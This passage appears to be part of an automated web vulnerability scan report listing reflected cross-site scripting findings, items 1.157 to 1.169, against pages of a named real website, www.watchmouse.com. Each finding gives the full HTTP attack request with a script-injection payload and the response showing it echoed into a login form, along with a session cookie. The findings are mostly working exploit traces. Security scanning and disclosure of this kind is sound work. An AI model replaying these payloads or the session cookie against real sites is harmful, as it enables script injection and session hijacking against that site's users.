This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feed.phpff9ba"><script>alert(1)</script>ed691d874bf HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:36 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-d4a3b78a867db56c33a3b3cdbed332e6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feed.phpff9ba"><script>alert(1)</script>ed691d874bf" method="post">
...[SNIP]...

1.157. http://www.watchmouse.com/en/feed.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.watchmouse.com
Path:   /en/feed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2af06<a>6eaf5898bfc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/feed.php/2af06<a>6eaf5898bfc HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:15 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c4de4464f831115a59c07f88cd87ea01"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=utf-8
Content-Length: 22323

<?xml version="1.0" encoding="utf-8"?>
<!-- RSS generated by WatchMouse script -->
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<title>WatchMouse website moni
...[SNIP]...
<generator>/feed.php/2af06<a>6eaf5898bfc</generator>
...[SNIP]...

1.158. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6027a"><script>alert(1)</script>fd2f65145f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en6027a"><script>alert(1)</script>fd2f65145f2/free_resources.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-5a9e53306883a1cea83c33ec579b70e8"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en6027a"><script>alert(1)</script>fd2f65145f2/free_resources.php" method="post">
...[SNIP]...

1.159. http://www.watchmouse.com/en/free_resources.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e39ca"><script>alert(1)</script>7fa5125914a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/free_resources.phpe39ca"><script>alert(1)</script>7fa5125914a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-28eeebd99b19f2a714dbb37af095e23a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/free_resources.phpe39ca"><script>alert(1)</script>7fa5125914a" method="post">
...[SNIP]...

1.160. http://www.watchmouse.com/en/free_resources.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/free_resources.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a38"><script>alert(1)</script>7b91e4f59b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/free_resources.php?15a38"><script>alert(1)</script>7b91e4f59b0=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-31349f9075c5200d0736c0ffdfac0306"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/free_resources.php?15a38"><script>alert(1)</script>7b91e4f59b0=1" method="post">
...[SNIP]...

1.161. http://www.watchmouse.com/en/howto.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbfcf"><script>alert(1)</script>65f653a8067 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enbbfcf"><script>alert(1)</script>65f653a8067/howto.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b4974f54a2cc25cfe8293f04affc0314"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enbbfcf"><script>alert(1)</script>65f653a8067/howto.php" method="post">
...[SNIP]...

1.162. http://www.watchmouse.com/en/howto.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889b7"><script>alert(1)</script>9c455510f82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/howto.php889b7"><script>alert(1)</script>9c455510f82 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a6ad4a7aae18269c02d4f9d8ed1c7a15"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/howto.php889b7"><script>alert(1)</script>9c455510f82" method="post">
...[SNIP]...

1.163. http://www.watchmouse.com/en/howto.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/howto.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff8f8"><script>alert(1)</script>e4b06d57ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/howto.php?ff8f8"><script>alert(1)</script>e4b06d57ffb=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f33b92c04639ac97f1a7843767fe280e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/howto.php?ff8f8"><script>alert(1)</script>e4b06d57ffb=1" method="post">
...[SNIP]...

1.164. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bed"><script>alert(1)</script>2fc6df0cf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ene9bed"><script>alert(1)</script>2fc6df0cf6a/inthenews.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cb6225893023d35d2e55f672eae648b9"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ene9bed"><script>alert(1)</script>2fc6df0cf6a/inthenews.php" method="post">
...[SNIP]...

1.165. http://www.watchmouse.com/en/inthenews.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc2a4"><script>alert(1)</script>17a1d67ff7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/inthenews.phpfc2a4"><script>alert(1)</script>17a1d67ff7 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f43ebff28777bd9a37ed5eff21ee918b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/inthenews.phpfc2a4"><script>alert(1)</script>17a1d67ff7" method="post">
...[SNIP]...

1.166. http://www.watchmouse.com/en/inthenews.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/inthenews.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec01d"><script>alert(1)</script>58f4872ff06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/inthenews.php?ec01d"><script>alert(1)</script>58f4872ff06=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-565b287b5379f056e133944a97943d83"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/inthenews.php?ec01d"><script>alert(1)</script>58f4872ff06=1" method="post">
...[SNIP]...

1.167. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b59b7"><script>alert(1)</script>89418b90718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enb59b7"><script>alert(1)</script>89418b90718/learn_more.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:00:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ea2664813f10784372a7c9f1bdbc1192"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enb59b7"><script>alert(1)</script>89418b90718/learn_more.php" method="post">
...[SNIP]...

1.168. http://www.watchmouse.com/en/learn_more.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d39b6"><script>alert(1)</script>d42424a7889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/learn_more.phpd39b6"><script>alert(1)</script>d42424a7889 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:00:41 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-fc7784df31ecb91d9ea5930f6b8f4a29"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/learn_more.phpd39b6"><script>alert(1)</script>d42424a7889" method="post">
...[SNIP]...

1.169. http://www.watchmouse.com/en/learn_more.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/learn_more.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edfa0"><script>alert(1)</script>4b83c53d260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/learn_more.php?edfa0"><script>alert(1)</script>4b83c53d260=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/feature/public-status-page.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.3.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:00:37 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Feb 2011 12:00:37 GMT
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 45231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
